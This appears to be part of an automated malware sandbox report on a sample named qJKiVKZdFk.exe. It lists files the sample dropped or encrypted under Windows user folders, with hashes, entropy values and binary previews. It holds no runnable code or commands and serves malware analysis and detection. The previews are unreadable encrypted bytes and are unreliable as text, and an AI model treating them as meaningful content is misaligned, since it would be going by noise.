                                                                                                                                      C:\Users\user\AppData\Local\D3DSCache\f4d41c5d09ae781\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):65536
                                                                                                                                      Entropy (8bit):0.30217803660487286
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:H1xLlfQXnpY+zQRVtdUdrFrPL/pbEA7mj2RSEaGpxdZGz:VppanaMQR3E5PzCAfRSEaGz+
                                                                                                                                      MD5:CBCC1FB38ECFF663E7A03B2BC7A44AB9
                                                                                                                                      SHA1:53FFDAF4C5A42541C55A54516F1295CC68394EB3
                                                                                                                                      SHA-256:112C6405474CBA640AD2927115864E8500377558EF5E9BB6A0613C647D0DFE34
                                                                                                                                      SHA-512:E07CDAE277D8367C43A9F980A27A0088BBD7FBD3A41FC273B710B1FA7B9B7FD36578EF2C38BBB142A0424332D6B02203E81E362148D6416FBA401A8EE3BE6D40
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.....&.&.8.oA...n.....,.....%a...0mJ~wZ....\.A.{.(wn,z ....l.~i.y'...O.....[.,...... )-......X.j...+1..<%F.E...31.*.....O...c...$V.4.A...z.~.. .'..v+..9.G...../...[..x.......h*.G.jJ.?..1c7xO|..E...h..^.<.6......aG!.......>h..e.N&_.[.E3V.u.'%..,.r...#G..L.......4}.T.n8o/...7.6....&...*.2@..;.. L.....]x.;p..7.f.!.N..K..0..Ou.......?....$..>?..g..(Ad...u.4.......?.&...G.....G.......x..LH..zzf]d.]...^.4D...k.o...C....<..G...[..8..(..Y.S<....}.I.$...da.....A..PY...3...V...?^..x..0w6......`J..@.&e<........j......y.V^M0.q|G.`.:.q..%....Z..>wd(..|x...5f.o)J`k.5.HP...>.l...b".......o..+L..e....v....n.I......I.7.....A..U./...._..S..5.S.....{gp:C;z....'...+..`.y.....t....3.Z$e..'&*.........c"..m.$..w....+..E*........Q......x2....xl.&.6Pi.&....k.0...w....P..j.m.z...\.]P...e.%.a.h........M7......K.%.c...#....5...C...NaVXgG...S....&.......OX.,....9....V..O...W.q..&` xpj....<',........E..0....S...;.'!..O.-...hsx@...7r.......Z:.I$.H..H....-..u

                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):49486
                                                                                                                                      Entropy (8bit):7.996163491879153
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:oZXC/I13AAtDkc7g0VxqyZB36oEI6YDZwab6Vz:wMu3tgc7g0H7tnZwabQz
                                                                                                                                      MD5:750F1EA6C394437F1D088ECFAADD7222
                                                                                                                                      SHA1:1150DB974093BD36B8AB2D950551947C31A8D25E
                                                                                                                                      SHA-256:6A5C67097FB9E845E764BC7C107D2ACA9EA6E51326ACA08884F142B897CBC939
                                                                                                                                      SHA-512:FCC0E01DB3BA87E336E2B2CBC75D9B25A08AF01824BAECD781724EC18DC8C143C002DC7E4B1DC525B5A6E48F95ED2093DD3BEF353BCBB450905575DCC596D580
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:SQLit...q..M..j...<.....&......c..o....i.D.vT..FE.S...w..\.l.`T-V....m..P"9.R...6..q_X..4....p`v.Z<&.Z..%-2...Ik9.})...Y.6..t)..Oz..@..D4......J.5H....?..p.x.N.I%.Q.[&....[Q..OG..r#..z..i..&.k...?G\.~.f`<../....|.u5..{]J.\...&.R...!.pQ.[..T....y..F......m.,<....o=Qb....V.X.......a6.........7.......E.Wk.p3Uv..*.r.....0...Z7P....0.R.=.o.%.w.]...".G5C.A.~...j.Z.yI.k..Nh.j..T..V+..nN.4.l....@..oui.M...............[N..).u.l...7.HuZ.4%..x..R...|.._..$...L5.....[O@..4.R>.....8n.G.....e..V.........S.. X..3.s..e.m...jme.]m....1.r .U.U...P....c.r.m...p_9.?K.=..R"..gS.........v0.s.~....Ze.Jp.......;.....q...9(*.gQ..[4X'.?G..v;.H..}..9...C=.3....l...].c.*.o.{.....S.%..TS.<(&?=1./...t..ph...G.t.)7kjD........%X.u#.....*...[..a....A......]..#.&..F..=.8M._9..../l+.m...7..5^}....'..4pnD..e......O.~..M.....@^1,.p.p.y.13....z...'..iU...v..g.p.a..SaVQ,...(.kn...^Y.&KT..A.....e.....=...[*E...m..A...+.I..w...@.(...H.....^..OM2..8e.L....K.,.P...h.

                                                                                                                                      C:\Users\user\AppData\Local\IconCache.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):11317
                                                                                                                                      Entropy (8bit):7.983127959817394
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:XzdQzlJqx2h52yJl+5qcB2BQABggnyGV4kLQYe41qlS8uxC54RPowiiZXbs77O6/:XZMnJlTBGAv59LQtuql4Cqpowmq8
                                                                                                                                      MD5:7142E7BB97E9F17534D336434E0B0934
                                                                                                                                      SHA1:CA4C24D710A66A0351DB607789C8AF5578F792B9
                                                                                                                                      SHA-256:E78AA5C30F87C051458C128AED96FB730827A80D1E0A3E7E129A15BD8FE19838
                                                                                                                                      SHA-512:F131113706662FB49239E839992DBD875CA0129C8C3CA82A1CA722EADA11D1920EDB718F778A879B17A29A2A65F68C4956B6ED8148120F41A16A9626190E0150
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:H...W%'..j=.E..G^+.... ....G.0.....V...O.J.*.....%..{TZ9.P..)...<..)..8.P....r.4z.H...:x^$./^\.\W..)L.+K.i.G........-.M.Y#.f....C,.c.y..[<...:....c.......b'....:0.7.......,..Or......4..E..y...I=...Z+|.}.....VA.\.t((...{..T..M....v.Pv.#.5...o.r.....3/./......;G...n......b:...1S~.O....Hr=8..E....o.....`+.Q.}...V.#......(.o..N.].]....L.r.h...e...K...0.S.km&...s..w.e.YT.N.TS....B........W%S.....t!...y..K..-.F{*X.%....<...p....f.Z..8.......(".Fm.......9.x....)...?E=L.....;.'>8.-....N:..=...NE.$#...\...99>. .v.......*F.....X.[.?....,b.D..S...Q..z.s.....F..N.w#...?x1..Qn..cx.....\...P..B.p.s...y..-....fW...~l7..(.Ut;M..X9<....`.# Z..>.o.b...._..i&.E.....M..B..f....V=...m ....6..HD.Cz.bz..0.#...]..p....LB.0'..b.O..$=T.d...r..QF.SZ.r5.OC....l...Ua......m.D.|......U.,E%e..J!K..[..4..jy.t`...o..T.2..)I...Q|6.....I.6.M..;zg1.... J.|.f...#..Z.0.p...N...._.}...8.c.9....qS..&.>....Y=..F-e.3]...4._....Iof%#.p..._T....+...^K.j._.9&......l..c$,.....i4.F.p.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\unarchiver.exe.log

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):354
                                                                                                                                      Entropy (8bit):7.316899760622135
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:QRMBcgbeIlXeZvy5BhrKHF+cko+mXYrq6OjRottv1K9dgBs2w83ukIcii96Z:QRMBcgPNeuBhYEcwCjywi5w0ukIcii9a
                                                                                                                                      MD5:3720F7BB4C2B9979174AFD36B0887018
                                                                                                                                      SHA1:44FFF8418FCEAD836F9892EB04BDC32746089506
                                                                                                                                      SHA-256:FE2496952DE97616FACFBCB4B91E86A5AC180596BD3E8D7442ADADF4B2D155DD
                                                                                                                                      SHA-512:853E70D13C64CEA6EF11865B04B3D752CA239B6BFFF98747D78B06A76143B981A34B3034A2B43A3637A9965F8F6F048985BCF5B286DDAC05AE933BDF8049E77B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:1,"fu.....T....>....M.;....s.~..F.rNJ.N.9+.......}8;.-2...M... _.*.1.;..G....!]!...."D.%....3.[5....zy..v).........s"\...2...A.$j#3.-.s:Pi.i.O@..I...l.5..#2.e.+.....S...@fl.5G...=.f...C.}"....$........t...:k}.q..h#3*z....H.8.)P.......q...'..;....*...N.~..T.X.!.p..k.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\InspectorOfficeGadget.exe.log

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1554
                                                                                                                                      Entropy (8bit):7.8419135053715205
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:0BqeJ3fgy655de8ge7p/tCYHLVVWMqc643KD:8JYy655ngwCYrVVW5/43C
                                                                                                                                      MD5:3C022F88C6BCE3C7DBFCA24FE222125C
                                                                                                                                      SHA1:6E5F8C491724A36200DFF07BE9AA7C000EC9AE7B
                                                                                                                                      SHA-256:D04A23BBBC936DC81EFD2E6EF2F1F72212CD5E0A7EF00E1066CBEBF351667E9C
                                                                                                                                      SHA-512:306A110BC8DEBD99DAB1BB93EDC976F73A2D84527E43D9A97F1289F87700B9834F0161B0225C042731CC8B5B5F6D7263D53C9F04E968FA9EF8B85C70B019008C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:1,"fu...z@h.:...M?P.f.i.v.Z.6.N.2x.E..Cy.;.....y.#`G....R.AH...sid!..^..1L&C.......s..Z.Tl1...2J..`..V.M.....z..a....i..2P.M...$..mUP}.....+....-i.<...e.7....^4...c..4.!'......{6|..F..2..V..j.....%...7..s<.....RY2....B..n...v.K.:.yo8.k..=%..9....5.[El.".P..).I.v..VRh"O....tVi';Hh.N...0$C.D..p...{...H...i...an.E,.........:y.Z..7.%..+..YK.l.<.t.m. .q@......"A!.+6a.U........z.74V....{.e.gl&8...CP~,Bbw...f.;B......44..9....T....1.....9....Ay..05.nKt).?..8O@vD......;\*g..Nw..M........GF.....k.a. C...q..1s85v.5.E.....~....J)m.[..P....6..O4C..Z.>wR......7.GPCL..........23.+.e&.)..J<..v.r..h.I....T.k...........!.........K...ai.m2.......@....&1.../....dTB.!..+...R...).}..!.p...Zj.T}.......T&..A..K....<...=.J.[F.-....l.l....$6....l..u85..R.[._..%M.<......r.te&/.4rW.i6ysPGJ....)i:...W6U.DT.bg.;._.-...~...RW...0...9.N...._v.F........WV.%...3..)wQl....Y..}....SFWh~.h...].P...[J.qww......_..?....0..N..X!?...~..F..!p:u..N.6b.....r.{.U..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\LocalBridge.exe.log

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1952
                                                                                                                                      Entropy (8bit):7.889739541759159
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:H2He61VwEU18apy3GtRXAz+RrsiFocbwD3HnuFIJBsXeGeaD:Hz6jdU1nWGtRQz+9Vicb23HgrXHp
                                                                                                                                      MD5:6F6C22B7B2A03375AB614F96BF2CE4C2
                                                                                                                                      SHA1:54CB00E2894757A80DA269A5578E8384279A616F
                                                                                                                                      SHA-256:4D5E15F7C9523E8C208F7CBC01D3D312566107CD183F3B23744FF89DF5945C21
                                                                                                                                      SHA-512:714583D8B8B6F7AC3E77E2876D8975D889DB84FDC6F8CF02C62B2F379736F4C56CDF83770319BD0D63B1D9E933591CC07888C844B4FE08190E7590442DEEC19F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:1,"fu.y....cz..=t....`............6..E+...g..TX....l...I....M*...+..DF7......=..(... d.(.y.D.._E.<...E3d..C....F..b....]..2...R...l.~..L..n..:S.Le.9...8..O.XO.4...QM.N.]....]\-....%.0..Kw..|....<......'...:q.@....H..!O.s.;"|V..Nd4,.WGL.<.....[.At...t#.;3...(r..>zZf(c...@..J>..E.t.f@....).4.X..c.jl.8$]....6....iT...x.Q..M.A.@.3WAnE..4.t..._.})..,~....sh]:N.f*.^.x!.b.=b.i-.d.H.[..!.b.J.e{..N.1s....u.....R.J)*.&....;..]L.g.....Xo...e4.wU...j..?yJ1l.k!5....P......,G.g...n.4.m.6.^V.L.H.w..<.u_.Q6..3w.B.a.*J.9N.8.}].0...*.}....7R..H.(..g...+L#E,v......K...6y..+.hs..K.....=......".^............J.u)|.A.S..-.km..s.61...../..I..v......>KL%....j9.B=W..7V....Cu4........4.b.]..s.Hu..k..l......@.c".......U.j....Io.b...))..&~,>[Y...:.....+.....G.....h..p.U.g.8\6....N..2C.i>0u........Qi.....s.....>...I.WB...j`...^....n..a,C#.D\,..9..H<..5J..%..1..Z...&P.3..IN....,$8.s..C..V..f..z..+.n..........Y)....4Ln../cm...t..`..>;{z...^?T...9.Ar

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\CatalogCacheMetaData.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2203
                                                                                                                                      Entropy (8bit):7.912291104518468
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:wEYiSFYjKNkmuMkG2yDuKHcltf4U9pKZvoqdy/UQGBIyKzlWAIqXQnD:f3SVn2yDuK8fLwvDy/UH9Kz5LgD
                                                                                                                                      MD5:DB976CD4F8EF07256828C42FA4E18ADF
                                                                                                                                      SHA1:8F7C46F5189ABA87AE7E56573D89F56EF991FA59
                                                                                                                                      SHA-256:117E85BEE93A0B7C4D8140A4A1D2DD5AF11E8ABC10F84505403E407DFC3D70FF
                                                                                                                                      SHA-512:0D2308263AD323BC2BA6D3779401F8650D6C14012A95EEEE861CF9280474440E0F4D946E3D2FC3D1BD88F1D214D469EFEAFF4B21F0C2066EF94BC69FA44E679F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml._.E....TC.a..V..p}Th%7.;..Kp.Y*..#...h...,1.(UJ.Q.nL............T..#&[N1AN.H.....K..G5...>..Fb.2....XB..e!....uIN"D..@t.-CI.zd...@...;..r......xW......... ........T.[<.....1..H....}..Q.<t)xV.!O".&."..A=....(|....h...jgo.A..........F.C..aW.^.6.}...6RG.Y..;.}......M..,.c8..D.{+<V....2...E.}3.....@..Z..m...}.`......W...Q......s...0m...V....e.........ZfQ..o]..q....c..Y.C.....e8$u...IWD./%./....._..R.....AI...%.4..9.BOrt.......P.'..YYM.........$e./..MUR.F$r......y.. ..-..^.].7..g"-.._..=.M.6.R..G...t%..t..=.}..YIgec.D#\..D..;D|wK.m..wt.VZ..];I....X2....\.)~...X.._...v.h"nX..1P....M...F..h.0H.9...B*bT...b.....v....Np..%...W..&$./.].=.`.;T7O]g.....%.[._..K...d.,.x.. &t9X.z...$o.I.E.....s.q.y..k,..".Fr............. . ..T|..1....v.6...:....2.=.y...#.j...G.Y%...u.|.3|.zv+.Y.X.4..N..v..S.g.kC..qCYn.V..ph".j.g..x..u..V.U.p8.D..c....he*``.va.+W...jaM'U.bM.i..b...\...8..o......s.`...Y.34.N...9.,..}..M.I`^...(.J.P%/.....-.m......%...p.u.....

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\CacheStorage\edb.chk

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.976957743237655
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:S94jIZMz6y8rDP/dWpIyh86VvoMbP5DIjmW8dFGpPczPK+:S948Kz9sdVyFVvoMbRDIjmrdFGpPSPK+
                                                                                                                                      MD5:FBF280579338E7650B96CED720C53218
                                                                                                                                      SHA1:FF5E013540B0F31829CF25E70B4890323F975AEE
                                                                                                                                      SHA-256:416CCDF743681C89AECAA2F848E28CC4EE3DEAB9A5FB0F244BD907D4F5BFEC93
                                                                                                                                      SHA-512:A30D60480C58EA8A0B76686A3AE3C46DCF488BD983CA841FE7752374292CA1A1A69766656B7883D1BB90639C74156DAC7715EF504960F2E43FFBE73736D204B8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.._.:e...\.~.'{. @./#$}0.4..y....5s.Wk.j.X.( r.J....6....]......h).....H..)y......wn......@~..Z.iz..x..%7...Cr....I.|._AP>.R./&....k..X..o.EOC.De.a..P....j...qN\%(..(..T..CA..Y.....3..9<..0.'.!G{.....".L7.Z...6......w..Z.(..g....yq.E.)]"6=....i45.h.....d.U..A..b...'.V....>.?.Z.....R....&^>...&..#..jn...g....@.c.H._:.3uw..T..z....!J..>(...?.....M..F.RN",%.j@....w..-. ..U..I..=U.7.=...v6...).x`.s.&..io9u^.`,Q..]..B ..Wb.%'.E....l=....i.=.U.C.....Y..8.O..k..]*..._.X...d.S.x.5(.[G.......\.I.S.S-..R....u"...P..,..X...]!e.!$3+e..f..E.Y_.{..7-g.%nAG.v}.......x..G|a.O.e..K.cz....V.o.>..U..g.C......M.....g..w.X.(P.....*.....#......*:.,.....>*.s.....C..Z<.|......bW_f.M..?J.r!.@G.."...3.....k@.6K..o#........B..........Vr...xd.#*fTT.3C\&`z.f......7..s...qO)[.HSLa.N.,.B...qX...p.......7m"(.x....l...w....q..8a...w.<J^Mb.N... ......=.6.uPW...,.a+...O+HV.Jd...s....j,YY.....(....E.P8d...W.....g...U...W.h..."..b3.../;.... . ..vl.....6.D.".u........S

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\CacheStorage\edb.log

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):524622
                                                                                                                                      Entropy (8bit):3.953112367835487
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:/kW+mnhoJm27EbrIbKT/+ypy1J4AfsrkDe5pJnr5g/V8F24zmIgEkrfVgDXmRjF+:/kW+u6827A/+yC5soAz+V4SIgE4hA
                                                                                                                                      MD5:517E258372CBE0F8E679ED8D96F15457
                                                                                                                                      SHA1:9D10EA8C477A692CBF67459776ECC4A4E7CB1143
                                                                                                                                      SHA-256:42AE6CBCE2C4D52873D883FDF6F1AED265B731984D7A1A1EAD3C96F686E21339
                                                                                                                                      SHA-512:9575E9BCA3A87FBEEFEC3E1D2099627133E932DA318F6AD57E1FD21180CD4C913A0AD04629EA7B0785F17C381827375DC56F574C8815D9FCD34C287E784580A0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:cy7......Lw._..*G...m5......>.(......*.7.+.).^..|cs?....x...9...-..v.5..:..O.%tQX...d..O.O+...a.`..b...5....I..n.a|r...#...o.pO|....4...A....J...w[.jnU..'K..~..?....l,b....\3R.%......]..JB..\....M<!.G.-....Q.c..M../Q....P../.(].!...<.@XA^.....9[..Ye...../.W'...{.+u^H.L.=.....Y..z..........~.B\y.5.1..t......C....s.]...A.....E.Y.K./2t..M.1x..Y/.FV..8....}..8..~./...q.;-.V9..Hd....w.jh.....).JS...1>..2t..|.p.F......n..T.A.Q....S...t.]tFf|.;vF..;..I^..\)..W R...3C.|...8G ..j#*M.6.]........l..:{.S....9_...$.R..E....f..............l.R.8..;.."cg.'B.?.\....:ME.f!....[...y....p".RQ.Al.C.@...EB #a..'vQ.T...j......4...B.....v-.~f...z.....F.p....\lC6........!.j&.T........u.> B....%...d'L#..R....p.....=k.3.;.'..-d..wH..!y{.c..k.dP.lA.q#a..L......8.gi.V)EeF...\f.!/..qz..N..]........w.wF.c..SO..X.g..Y4A;.q.dK...(W....W....C..1..f...GX.1r.~...7/[\.'.....N....x.7.A..43..;.,.v.#{.......C..0.......Y..bu...;=9-.O..Y.T...epW.r.;..A...v.N...L..wn.....'2......$.,....

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\CacheStorage\edbres00001.jrs

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):524622
                                                                                                                                      Entropy (8bit):3.2082449339275882
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:Mqv8/ZJPtpGzwYheacg18SrI4DwdpNkADtCHTHOcnbqHR7pSSi:MqU3PvGkYcJg18GI4Dwb6lZnM7I
                                                                                                                                      MD5:ED983C232458B1CAC9F9F65E3DD1D90D
                                                                                                                                      SHA1:C078EEA4ADAB8391FC5F6E33ED16C8B64E499BDE
                                                                                                                                      SHA-256:CBC4D7995834B12274C83E629C34B48890BB8168A408080F9B1EC553ABA28F66
                                                                                                                                      SHA-512:3CB1643466CD714813F5B9298383AC60C9C66D00192359D71716386C7643F7C1FEEDB9021694697D79C4515BC8BB23BD052AC8F572526EF3FC74CC5825FBB51D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:......1T=.Z{;y./...~.........I.. uv.....=.R.R.'.........n.....x:.F6...d..G..q..ae.O.!v..au.p.80..?.yFRM......b.4J.].a..%Q.L..*..t.R...R".tYl.....uK@.qPIJf.0o..0....y.+3Q.....C..1.4.,;..v..d.......#..f.F.O.+"..r..7.@.AU..2b.$..u4[.2...q.........?..J..=.n&W.8m.0..p/u..h....G'.w.Q.y-~..QT.v^n.v.....4.=k.:&.S`S..GIv...*@..K....%n.k.....9.R&l.........E..n..(C.\Wb...nK.FR.8I.!..R.......l.k=..o}.f.I."n...-H.*......[jY...}+...rNMJ.........(...5....`C.....<l.`...=2.V.6|..W..W....m......0.._...9M<..uxi.R...%.S[...X...f..z.".o..-.i......[tV6u\.9...S....j?}...G,i~i.6.....A....+.X9.*...E?.1...2....aE..-..{k..|.~..>....:..s..B.....P.5z..."..L4t.N....{..|.W.F.P..@...Y{C.....m.W-D.K.6U[..5GYV....R.k ...x..[|`...h.q.....F..T...q.S0...1..+........l.,.f......."."......-...............Y.f.$.%%..\C.Ya.$....p..t..e..~....9K...IJ3._....1X...m.U..Y<:...C`....f/.P....+8.I^.5.q.s|........I.E...P[...F.H...t.c.)].C.2.X....t.,.Z......J.@P..HwA...~.oD....

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\CacheStorage\edbres00002.jrs

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):524622
                                                                                                                                      Entropy (8bit):3.207562784429721
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:Kktl2Sj9Kvi1qySelRxzkprJksxSy3RImqoGoi0mVx3W3hULBNQwSW1H:3jcwrSrrVUuDG9J6xULBqwR5
                                                                                                                                      MD5:CD5D2334DEAB55251FAB24DC0E1A6A2A
                                                                                                                                      SHA1:6B1255D27650BBCD33BC06AC2F28E5490CAA8046
                                                                                                                                      SHA-256:3C5D1E137333361EBE27C028C24A4AB955266CAAC1240CC9E1C049EE9A626425
                                                                                                                                      SHA-512:FD91ED0E2FA018119C104D3FFC00DA9B2B6718DD3CD93B37B83B99F8E17BB262D1AE63C9ACEB712DD4345E90DFCBAB375944693125EAD11508F1DEF1A75AC373
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:......z.....Z9|..J.Q^$...o.x..`...8{.Kig..{...h.....#.=......b.m%........uP...KO6..h......W|8D.pvi..z.'.t..q.....h~\.:i!.g...>&C.{...Z.......i..@..-..p2.D.R..`.q.Z...T....+tb'.[.WR72..L..s.J.Wk:./.I..,...*..'/;.R a.C..ua..2l0...$S.dk.m...\...d...x....6.S.|....L..(7....]..tb:.2....u...<...k. a...a.9..0.L.Z......FR..P.M...R9N....\D.....0.e2..u.-.Q....`...,l......e3.7p.Z.Iz@t..L.$.......:....n.y.E..25.`.{..r.jS.6_..+'*...HW8.#.6.z......._...v:t.qK...7.|.$..........X.f.c.."f..A.....i..$m.9f_.....fxl..G..E.S4.E.o^:}..6..i..`a.....'...1..07..].~L.qcpyQU.<..k.J...YG1..W!...f..$[RL1.@....Q?.Z...)..|f......1*..5......+.q.@g.jv.....).|....(...6..u8.....4..%...J..5..'s.~..........g.J.c...m.}.%.....a..@*#K.Y.M...' 8...o...37.2(......Oc.C..U.8.R.I...i.a7H.a..... (..F= v.........(...d...4p......F...+...R..9c...A..M6..j.t.A.!..l.g........\|5.].ci...l..!h..[Y=....K.....E(.....].$r.15.<bL..qQ."v..Q..k..a=..4WW$.....5..uI. .T..=... -.M..e...|...

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\CacheStorage\edbtmp.log

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):524622
                                                                                                                                      Entropy (8bit):3.208333850932194
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:ICupOmY/rl5Z5RChHzIdOGYf0nt2EWrjHOWBlKuVLCgUQNDY:ICuRY/rl35RmUwGYfSo/HHbBlKug+Y
                                                                                                                                      MD5:EFBB1D4750D4BA277E8508D55AE44992
                                                                                                                                      SHA1:5624E32E80117BA0B00FE142E65FF02C9A5F7FA5
                                                                                                                                      SHA-256:23C66E8D42B06C7FB46C8C8376A09B242969D8708BF7CF454E0F3E202137D2CC
                                                                                                                                      SHA-512:71D6DB669D53462BBB0A1B18A85574D185A5DA0330112C52574657F022EB5D75986C48861D28F767B3EB297C92923C76DB097797926D746472038F7471D01423
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:......t7..:..1u.~|x.M..-...0. .a.?.y@......<....w......L...!>ZJ..>.. ._."c.m.&CI.g......q........+..L.m...nq.....+.......s)..V..,..y..&...p...J..w...6Rl}y.`$...E.K..i>..F.}...J.ou....,T...rbs..-m..F...s....R..eQ.g...K..In..........S..Re...rB..2..m.P.A.o...S..N.k.=j.............l.o.|0.......bQ.f.I=.N2E..>..Vw.....X?.x'.o.'.x+;..C.?s...)]H.aB.. ......&.U_..S.. .>......v..z..*...E.85.r.s.x"M7.n..*.de7...9Rg..@(.....N...b@;...$R.g....a.C..O..... ...@...T...\.".g.}....h...)..~i.j.fN.g)JdHE!.H[..cXX..$.E....t{..E.@t...-I.-..........!..a%.Fj1{5..x.:c.g....n&.qM...F...`F...$3..G..'Sevi...8..!O.q ......U........]3m.....~1KC.m..V}K.......Hd.6&...9..J....U-..R..../....Z..%.U..\..X+..&.w.T.......*..../,.8..b......;....`.....>..L...X...CE.-o.i.}-O.........Q..!.|.K.K1{%[7.-=.~....t.....t.......m....".2.]x...=4...0`.a..J....7..y..@. #..v.K..f...9G'1..Y....?=...7.`.r..^...".mZ...lr.j.....WEq.{DY.h....p...*e.'r.....c0.".]..U~..S..Y..BP...a.Dn.....c..k.i

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3384
                                                                                                                                      Entropy (8bit):7.943016740284594
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:QsUs18e12PGH2G8fSWNvTuvOvbhuvnw5nXsi:wse0O3G89N7JzhuvVi
                                                                                                                                      MD5:0D65AC5E4B9268903718632BC605B7EB
                                                                                                                                      SHA1:76AA1C1055D6879C3A71A78D04F47C1BC7B9D065
                                                                                                                                      SHA-256:BD089FA8A578A324CD7AA11E51CD45D29A96515B67EA8D2BC60955A75EA39415
                                                                                                                                      SHA-512:F3AE249AE5497B7ACEA5B90C5728628F5AA087307CFEBC01F2BEA268C812BD1E5B3D1FD36C529E5E221EF4A98AF9A8F3144DEF37A4619B8B2DB0265E4348A401
                                                                                                                                      Malicious:false
